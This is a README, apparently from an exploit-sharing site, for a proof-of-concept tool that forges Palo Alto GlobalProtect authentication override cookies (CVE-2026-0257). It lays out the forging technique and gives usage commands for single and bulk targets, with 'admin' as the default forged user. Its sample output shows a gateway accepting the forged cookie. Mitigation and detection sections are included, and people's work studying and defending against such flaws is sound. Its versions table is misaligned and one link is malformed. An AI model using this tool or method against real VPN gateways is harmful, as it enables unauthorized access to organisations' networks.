## https://sploitus.com/exploit?id=B28323F0-25A8-5DCC-8A76-D36777FF720C
# CVE-2026-0257 - Palo Alto Networks GlobalProtect Authentication Override Cookie Forgery
## Overview
CVE-2026-0257 is a medium-severity (treat as critical) authentication bypass vulnerability affecting Palo Alto Networks PAN-OS and Prisma Access. It enables remote unauthenticated attackers to forge GlobalProtect authentication override cookies and establish VPN connections when specific configurations are present.
**CISA KEV**: Added May 29, 2026
**CVSS v4**: Medium (treat as critical due to edge-facing VPN impact)
**First observed exploitation**: May 17, 2026
## How It Works
The vulnerability exploits the authentication override feature in GlobalProtect, which issues cookies to authenticated users as bearer-like tokens. The exploit works by:
1. Retrieving the certificate chain from the GlobalProtect portal/gateway HTTPS service
2. Iterating through each certificate's public key
3. Forging an authentication override cookie encrypted with each public key
4. Testing the forged cookie against the gateway's `/ssl-vpn/login.esp` endpoint
5. If the appliance reused the cookie encryption certificate with its HTTPS service, the forged cookie is accepted
The root cause: when the certificate used for encrypting/decrypting authentication override cookies is the same as (or shares a public key with) the HTTPS service certificate, any remote attacker can obtain the public key from the TLS handshake and forge arbitrary cookies. No signature verification occurs after decryption on the server side.
## Affected Products
| Product | Affected Versions | Unaffected Versions |
|---------|------------------|-------------------|
| PAN-OS 12.1 | = 12.1.4-h6, >= 12.1.7 |
| PAN-OS 11.2 | = 11.2.4-h17, >= 11.2.7-h14, >= 11.2.10-h7, >= 11.2.12 |
| PAN-OS 11.1 | = 11.1.4-h33, >= 11.1.6-h32, >= 11.1.7-h6, >= 11.1.10-h25, >= 11.1.13-h5, >= 11.1.15 |
| PAN-OS 10.2 | = 10.2.7-h34, >= 10.2.10-h36, >= 10.2.13-h21, >= 10.2.16-h7, >= 10.2.18-h6 |
| Prisma Access 11.2.0 | = 11.2.7-h13 |
| Prisma Access 10.2.0 | = 10.2.10-h36 |
**Requirements for exploitation:**
- Authentication override feature must be enabled in the GlobalProtect portal or gateway
- The cookie encryption/decryption certificate must be reused with another feature (e.g., HTTPS service)
## Requirements
- Python 3.6+
```bash
pip install -r requirements.txt
```
## Usage
### Single target
```bash
python exploit_poc.py --target
python exploit_poc.py --target --port 8443
python exploit_poc.py --target --user
```
### Multiple targets from file
Create a file with targets (one per line, `ip:port` format):
```
# targets.txt
192.168.1.1:443
10.0.0.1:443
vpn.example.com:8443
```
```bash
python exploit_poc.py --target-file targets.txt
```
### Options
| Option | Description | Default |
|--------|-------------|---------|
| `--target` | Target IP or hostname | - |
| `--target-file` | File containing targets (ip:port per line) | - |
| `--user` | Username to forge cookie for | admin |
| `--domain` | Domain for cookie | (empty) |
| `--host-id` | Host ID for cookie | (empty) |
| `--client-os` | Client OS string for cookie | Windows |
| `--client-ip` | Client IP in cookie | 0.0.0.0 |
| `--context` | Context to test: gateway, portal, or both | both |
| `--verbose` | Print full server response | - |
## Expected Output
```
============================================================
Target: 192.168.1.1:443
============================================================
Retrieving certificate chain from 192.168.1.1:443 ...
Found 2 certificate(s) in chain:
[0] CN=Root CA (RSA 4096 bits, CA=True)
[1] CN=Gateway Cert (RSA 2048 bits, CA=False)
Forging cookie for user 'admin', testing each key
Trying [0] CN=Root CA
Gateway did not accept the forged cookie (192.168.1.1:443)
Trying [1] CN=Gateway Cert
Gateway accepted the forged cookie (192.168.1.1:443)
Cookie:
```
## Mitigation
1. **Upgrade** to a vendor-supplied patch (see versions table above)
2. **Disable** the authentication override feature in GlobalProtect portal/gateway settings
3. **Generate a new certificate** exclusively for authentication override cookies (do not reuse with HTTPS or other features)
## Detection
Monitor GlobalProtect authentication logs for:
- Successful cookie-based authentication from unexpected source IPs
- Local account logons via generic non-human identities (e.g., `admin`)
- Consistent MAC addresses across multiple exploitation waves
- Authentication latency anomalies
Example suspicious log entry:
```
GLOBALPROTECT,0,2817,...,gateway-auth,login,Cookie,,admin,...,GP-CLIENT,...,6.0.0,,Linux,...,success
```
## References
- [Palo Alto Networks Advisory](hhttps://security.paloaltonetworks.com/CVE-2026-0257)
- [Rapid7 Analysis](https://www.rapid7.com/blog/post/etr-rapid7-observed-exploitation-of-pan-os-globalprotect-authentication-bypass-vulnerability-cve-2026-0257)
## Disclaimer
This tool is for authorized security testing and defensive purposes only. Ensure you have proper authorization before testing any target systems.